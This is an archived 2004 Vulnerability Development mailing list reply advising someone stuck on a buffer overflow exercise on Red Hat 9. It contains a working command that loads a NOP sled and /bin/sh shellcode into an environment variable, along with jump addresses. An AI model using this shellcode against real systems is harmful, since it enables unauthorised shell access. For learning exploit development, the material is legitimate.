Vulnerability Development mailing list archives
Re: Buffer Overflow Help
From: Harry de Grote <rik.bobbaers () cc kuleuven ac be>
Date: Wed, 10 Nov 2004 12:01:24 +0200
Op Tuesday 09 November 2004 04:09, eip () tampabay rr com sgreifde: <snip>
I am running GCC version 3.2.2 20030222 (Red Hat Linux 3.2.2-5) on a Redhat 9 box kernel 2.4.20-31.9. Am I doing something wrong?
no, you don't
but... RH does randomize the stack a little iirc
so, my way of doing stuff then, is just brute force it! :)
(you could also return tu libc or whatever)
best way to do it (i think) is : put your shellcode in the env...
export SHELLCODE=`perl -e '{print "\x90"x65000 .
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`
that should give you some breathing space for where to jump to...
shellcode starts (on my box at 0xbfff0027, so everything from there to
0xbffffe00 sould do fine...
--
harry
aka Rik Bobbaers
K.U.Leuven - LUDIT -=- Tel: +32 485 52 71 50
Rik.Bobbaers () cc kuleuven ac be -=- http://harry.ulyssis.org
"\x41\x20\x63\x6f\x6d\x70\x75\x74\x65\x72\x20\x77\x69\x74\x68\x6f\x75\x74\x20"
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x69\x73\x20\x6c\x69\x6b\x65\x20\x61\x20\x66"
"\x69\x73\x68\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x61\x20\x62\x69\x63\x79\x63"
"\x6c\x65\x0a\x00"
Current thread:
- Buffer Overflow Help eip (Nov 09)
- Re: Buffer Overflow Help Harry de Grote (Nov 10)
- Re: Buffer Overflow Help runixd (Nov 10)
- <Possible follow-ups>
- RE: Buffer Overflow Help Carlos Carvalho (Nov 10)
- Re: Buffer Overflow Help Steve Bonds (Nov 12)
- Re: Buffer Overflow Help Marco Ivaldi (Nov 12)
- Re: Buffer Overflow Help sin (Nov 12)
- Re: Buffer Overflow Help Steve Bonds (Nov 14)
- RE: Buffer Overflow Help Chris Eagle (Nov 15)
- Re: Buffer Overflow Help Steve Bonds (Nov 15)
- Re: Buffer Overflow Help sin (Nov 12)
- Re: Buffer Overflow Help Harry de Grote (Nov 10)
